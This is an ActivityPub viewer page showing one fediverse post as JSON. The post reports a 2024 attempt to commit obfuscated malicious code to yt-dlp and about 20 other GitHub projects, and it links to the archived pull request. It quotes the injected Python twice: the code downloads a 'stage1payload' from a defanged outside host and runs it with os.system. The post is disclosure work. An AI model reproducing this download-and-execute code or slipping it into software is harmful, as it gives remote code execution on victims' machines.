ActivityPub Viewer

A small tool to view real-world ActivityPub objects as JSON! Enter a URL or username from Mastodon or a similar service below, and we'll send a request with the right Accept header to the server to view the underlying object.

Open in browser →
{ "@context": [ "https://www.w3.org/ns/activitystreams", "https://varishangout.net/schemas/litepub-0.1.jsonld", { "@language": "und" } ], "actor": "https://varishangout.net/users/DarkMahesvara", "attachment": [ { "mediaType": "image/jpeg", "name": "", "type": "Document", "url": "https://varishangout.net/media/740bf503-f446-4476-a780-384ac8a72f53/53253523.jpg" } ], "attributedTo": "https://varishangout.net/users/DarkMahesvara", "cc": [ "https://varishangout.net/users/DarkMahesvara/followers" ], "content": "someone tried to commit obviously obfuscated malicious code to yt-dlp, stable diffusion, streamlink, qutebrowser, ungoogle chromium and about 20 other github projects. apparently mostly a impersonation attack used to smear.<br><br>code:<br>&#39;import os\\nimport urllib\\nimport urllib.request\\nx = urllib.request.urlopen(&quot;https://www(.)evildojo.com/stage1payload&quot;)\\ny = x.read()\\nz = y\\x04\\x06decode(&quot;utf8&quot;)\\nx.close()\\nos.system(z)\\n&#39;<br><br><a href=\"https://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520\" rel=\"ugc\">https://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520</a><br><br><a href=\"https://xcancel.com/vxunderground/status/1856450468945506615\" rel=\"ugc\">https://xcancel.com/vxunderground/status/1856450468945506615</a><br><br><a href=\"https://xcancel.com/evildojo666/status/1856413636748562827\" rel=\"ugc\">https://xcancel.com/evildojo666/status/1856413636748562827</a>", "context": "https://varishangout.net/contexts/51374871-221e-4d9f-9c72-b1faa350fd27", "conversation": "https://varishangout.net/contexts/51374871-221e-4d9f-9c72-b1faa350fd27", "id": "https://varishangout.net/objects/7c89553b-f4c1-43a0-8900-e08e61899f35", "published": "2024-11-13T19:55:49.177692Z", "repliesCount": 3, "sensitive": null, "source": { "content": "someone tried to commit obviously obfuscated malicious code to yt-dlp, stable diffusion, streamlink, qutebrowser, ungoogle chromium and about 20 other github projects. apparently mostly a impersonation attack used to smear.\r\n\r\ncode:\r\n'import os\\nimport urllib\\nimport urllib.request\\nx = urllib.request.urlopen(\"https://www(.)evildojo.com/stage1payload\")\\ny = x.read()\\nz = y\\x04\\x06decode(\"utf8\")\\nx.close()\\nos.system(z)\\n'\r\n\r\nhttps://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520\r\n\r\nhttps://xcancel.com/vxunderground/status/1856450468945506615\r\n\r\nhttps://xcancel.com/evildojo666/status/1856413636748562827", "mediaType": "text/plain" }, "summary": "", "tag": [], "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "type": "Note" }